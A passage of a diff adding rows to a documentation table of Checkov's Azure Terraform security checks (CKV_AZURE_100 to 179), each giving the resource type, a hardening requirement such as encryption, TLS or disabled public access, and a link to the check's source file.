+| 1354 | CKV_AZURE_100   | resource | azurerm_cosmosdb_account                                | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py)                                                                                               |
+| 1355 | CKV_AZURE_101   | resource | azurerm_cosmosdb_account                                | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py)                                                                   |
+| 1356 | CKV_AZURE_102   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py)                                                                     |
+| 1357 | CKV_AZURE_103   | resource | azurerm_data_factory                                    | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py)                                                                     |
+| 1358 | CKV_AZURE_104   | resource | azurerm_data_factory                                    | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py)                                                             |
+| 1359 | CKV_AZURE_105   | resource | azurerm_data_lake_store                                 | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py)                                                                               |
+| 1360 | CKV_AZURE_106   | resource | azurerm_eventgrid_domain                                | Ensure that Azure Event Grid Domain public network access is disabled                                                                                                                                    | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py)                                                                     |
+| 1361 | CKV_AZURE_107   | resource | azurerm_api_management                                  | Ensure that API management services use virtual networks                                                                                                                                                 | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py)                                                                     |
+| 1362 | CKV_AZURE_108   | resource | azurerm_iothub                                          | Ensure that Azure IoT Hub disables public network access                                                                                                                                                 | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py)                                                                             |
+| 1363 | CKV_AZURE_109   | resource | azurerm_key_vault                                       | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py)                                                     |
+| 1364 | CKV_AZURE_110   | resource | azurerm_key_vault                                       | Ensure that key vault enables purge protection                                                                                                                                                           | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py)                                                                 |
+| 1365 | CKV_AZURE_111   | resource | azurerm_key_vault                                       | Ensure that key vault enables soft delete                                                                                                                                                                | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py)                                                                           |
+| 1366 | CKV_AZURE_112   | resource | azurerm_key_vault_key                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py)                                                                                                 |
+| 1367 | CKV_AZURE_113   | resource | azurerm_mssql_server                                    | Ensure that SQL server disables public network access                                                                                                                                                    | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py)                                                                   |
+| 1368 | CKV_AZURE_114   | resource | azurerm_key_vault_secret                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py)                                                                                           |
+| 1369 | CKV_AZURE_115   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS enables private clusters                                                                                                                                                                 | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py)                                                                           |
+| 1370 | CKV_AZURE_116   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS uses Azure Policies Add-on                                                                                                                                                               | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py)                                                                           |
+| 1371 | CKV_AZURE_117   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS uses disk encryption set                                                                                                                                                                 | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py)                                                                             |
+| 1372 | CKV_AZURE_118   | resource | azurerm_network_interface                               | Ensure that Network Interfaces disable IP forwarding                                                                                                                                                     | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py)                                                         |
+| 1373 | CKV_AZURE_119   | resource | azurerm_network_interface                               | Ensure that Network Interfaces don't use public IPs                                                                                                                                                      | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml)                                         |
+| 1374 | CKV_AZURE_120   | resource | azurerm_application_gateway                             | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                             |
+| 1375 | CKV_AZURE_120   | resource | azurerm_web_application_firewall_policy                 | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                             |
+| 1376 | CKV_AZURE_121   | resource | azurerm_frontdoor                                       | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py)                                                                             |
+| 1377 | CKV_AZURE_122   | resource | azurerm_web_application_firewall_policy                 | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes                                                                                                                            | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py)                                                                                               |
+| 1378 | CKV_AZURE_123   | resource | azurerm_frontdoor_firewall_policy                       | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py)                                                                                       |
+| 1379 | CKV_AZURE_124   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search disables public network access                                                                                                                                        | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py)                                                 |
+| 1380 | CKV_AZURE_125   | resource | azurerm_service_fabric_cluster                          | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py)                                             |
+| 1381 | CKV_AZURE_126   | resource | azurerm_service_fabric_cluster                          | Ensures that Active Directory is used for authentication for Service Fabric                                                                                                                              | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py)                                 |
+| 1382 | CKV_AZURE_127   | resource | azurerm_mysql_server                                    | Ensure that My SQL server enables Threat detection policy                                                                                                                                                | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py)                                                                         |
+| 1383 | CKV_AZURE_128   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables Threat detection policy                                                                                                                                            | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py)                                                             |
+| 1384 | CKV_AZURE_129   | resource | azurerm_mariadb_server                                  | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py)                                                                               |
+| 1385 | CKV_AZURE_130   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py)                                                                       |
+| 1386 | CKV_AZURE_131   | resource | azurerm_security_center_contact                         | Ensure that 'Security contact emails' is set                                                                                                                                                             | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py)                                                                       |
+| 1387 | CKV_AZURE_132   | resource | azurerm_cosmosdb_account                                | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py)                                                                   |
+| 1388 | CKV_AZURE_133   | resource | azurerm_frontdoor_firewall_policy                       | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py)                                                                       |
+| 1389 | CKV_AZURE_134   | resource | azurerm_cognitive_account                               | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py)                                                 |
+| 1390 | CKV_AZURE_135   | resource | azurerm_web_application_firewall_policy                 | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py)                                                                     |
+| 1391 | CKV_AZURE_136   | resource | azurerm_postgresql_flexible_server                      | Ensure that PostgreSQL Flexible server enables geo-redundant backups                                                                                                                                     | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py)                                                   |
+| 1392 | CKV_AZURE_137   | resource | azurerm_container_registry                              | Ensure ACR admin account is disabled                                                                                                                                                                     | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py)                                                                               |
+| 1393 | CKV_AZURE_138   | resource | azurerm_container_registry                              | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py)                                                                             |
+| 1394 | CKV_AZURE_139   | resource | azurerm_container_registry                              | Ensure ACR set to disable public networking                                                                                                                                                              | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py)                                                                 |
+| 1395 | CKV_AZURE_140   | resource | azurerm_cosmosdb_account                                | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py)                                                                           |
+| 1396 | CKV_AZURE_141   | resource | azurerm_kubernetes_cluster                              | Ensure AKS local admin account is disabled                                                                                                                                                               | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py)                                                                                   |
+| 1397 | CKV_AZURE_142   | resource | azurerm_machine_learning_compute_cluster                | Ensure Machine Learning Compute Cluster Local Authentication is disabled                                                                                                                                 | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py)                                                                                                 |
+| 1398 | CKV_AZURE_143   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster nodes do not have public IP addresses                                                                                                                                                 | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py)                                                                               |
+| 1399 | CKV_AZURE_144   | resource | azurerm_machine_learning_workspace                      | Ensure that Public Access is disabled for Machine Learning Workspace                                                                                                                                     | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py)                                                                                                 |
+| 1400 | CKV_AZURE_145   | resource | azurerm_function_app                                    | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1401 | CKV_AZURE_145   | resource | azurerm_function_app_slot                               | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1402 | CKV_AZURE_145   | resource | azurerm_linux_function_app                              | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1403 | CKV_AZURE_145   | resource | azurerm_linux_function_app_slot                         | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1404 | CKV_AZURE_145   | resource | azurerm_windows_function_app                            | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1405 | CKV_AZURE_145   | resource | azurerm_windows_function_app_slot                       | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1406 | CKV_AZURE_146   | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server                                                                                                                    | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py)                                                       |
+| 1407 | CKV_AZURE_147   | resource | azurerm_postgresql_server                               | Ensure PostgreSQL is using the latest version of TLS encryption                                                                                                                                          | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py)                                                                               |
+| 1408 | CKV_AZURE_148   | resource | azurerm_redis_cache                                     | Ensure Redis Cache is using the latest version of TLS encryption                                                                                                                                         | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py)                                                                               |
+| 1409 | CKV_AZURE_149   | resource | azurerm_linux_virtual_machine                           | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                               |
+| 1410 | CKV_AZURE_149   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                               |
+| 1411 | CKV_AZURE_150   | resource | azurerm_machine_learning_compute_cluster                | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0                                                                                                                                           | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py)                                                                             |
+| 1412 | CKV_AZURE_151   | resource | azurerm_windows_virtual_machine                         | Ensure Windows VM enables encryption                                                                                                                                                                     | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py)                                                                                   |
+| 1413 | CKV_AZURE_152   | resource | azurerm_api_management                                  | Ensure Client Certificates are enforced for API management                                                                                                                                               | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py)                                                                         |
+| 1414 | CKV_AZURE_153   | resource | azurerm_app_service_slot                                | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 1415 | CKV_AZURE_153   | resource | azurerm_linux_web_app_slot                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 1416 | CKV_AZURE_153   | resource | azurerm_windows_web_app_slot                            | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 1417 | CKV_AZURE_154   | resource | azurerm_app_service_slot                                | Ensure the App service slot is using the latest version of TLS encryption                                                                                                                                | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py)                                                                                     |
+| 1418 | CKV_AZURE_155   | resource | azurerm_app_service_slot                                | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py)                                                                       |
+| 1419 | CKV_AZURE_156   | resource | azurerm_mssql_database_extended_auditing_policy         | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs                                                                                                    | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py)                                                             |
+| 1420 | CKV_AZURE_157   | resource | azurerm_synapse_workspace                               | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py)                                         |
+| 1421 | CKV_AZURE_158   | resource | azurerm_databricks_workspace                            | Ensure Databricks Workspace data plane to control plane communication happens over private link                                                                                                          | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py)                                                                 |
+| 1422 | CKV_AZURE_159   | resource | azurerm_function_app                                    | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                             |
+| 1423 | CKV_AZURE_159   | resource | azurerm_function_app_slot                               | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                             |
+| 1424 | CKV_AZURE_160   | resource | azurerm_network_security_group                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                                       |
+| 1425 | CKV_AZURE_160   | resource | azurerm_network_security_rule                           | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                                       |
+| 1426 | CKV_AZURE_161   | resource | azurerm_spring_cloud_api_portal                         | Ensures Spring Cloud API Portal is enabled on for HTTPS                                                                                                                                                  | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py)                                                                   |
+| 1427 | CKV_AZURE_162   | resource | azurerm_spring_cloud_api_portal                         | Ensures Spring Cloud API Portal Public Access Is Disabled                                                                                                                                                | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py)                                         |
+| 1428 | CKV_AZURE_163   | resource | azurerm_container_registry                              | Enable vulnerability scanning for container images.                                                                                                                                                      | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py)                                                                               |
+| 1429 | CKV_AZURE_164   | resource | azurerm_container_registry                              | Ensures that ACR uses signed/trusted images                                                                                                                                                              | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py)                                                                                         |
+| 1430 | CKV_AZURE_165   | resource | azurerm_container_registry                              | Ensure geo-replicated container registries to match multi-region container deployments.                                                                                                                  | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py)                                                                                             |
+| 1431 | CKV_AZURE_166   | resource | azurerm_container_registry                              | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py)                                                                             |
+| 1432 | CKV_AZURE_167   | resource | azurerm_container_registry                              | Ensure a retention policy is set to cleanup untagged manifests.                                                                                                                                          | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py)                                                                             |
+| 1433 | CKV_AZURE_168   | resource | azurerm_kubernetes_cluster                              | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                           |
+| 1434 | CKV_AZURE_168   | resource | azurerm_kubernetes_cluster_node_pool                    | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                           |
+| 1435 | CKV_AZURE_169   | resource | azurerm_kubernetes_cluster                              | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py)                                                                                   |
+| 1436 | CKV_AZURE_170   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS use the Paid Sku for its SLA                                                                                                                                                             | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py)                                                                                                     |
+| 1437 | CKV_AZURE_171   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py)                                                                                           |
+| 1438 | CKV_AZURE_172   | resource | azurerm_kubernetes_cluster                              | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py)                                                                                 |
+| 1439 | CKV_AZURE_173   | resource | azurerm_api_management                                  | Ensure API management uses at least TLS 1.2                                                                                                                                                              | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py)                                                                                   |
+| 1440 | CKV_AZURE_174   | resource | azurerm_api_management                                  | Ensure API management public access is disabled                                                                                                                                                          | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py)                                                                           |
+| 1441 | CKV_AZURE_175   | resource | azurerm_web_pubsub                                      | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py)                                                                                                     |
+| 1442 | CKV_AZURE_176   | resource | azurerm_web_pubsub                                      | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py)                                                                                   |
+| 1443 | CKV_AZURE_177   | resource | azurerm_windows_virtual_machine                         | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                                   |
+| 1444 | CKV_AZURE_177   | resource | azurerm_windows_virtual_machine_scale_set               | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                                   |
+| 1445 | CKV_AZURE_178   | resource | azurerm_linux_virtual_machine                           | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                                 |
+| 1446 | CKV_AZURE_178   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                                 |
+| 1447 | CKV_AZURE_179   | resource | azurerm_linux_virtual_machine                           | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
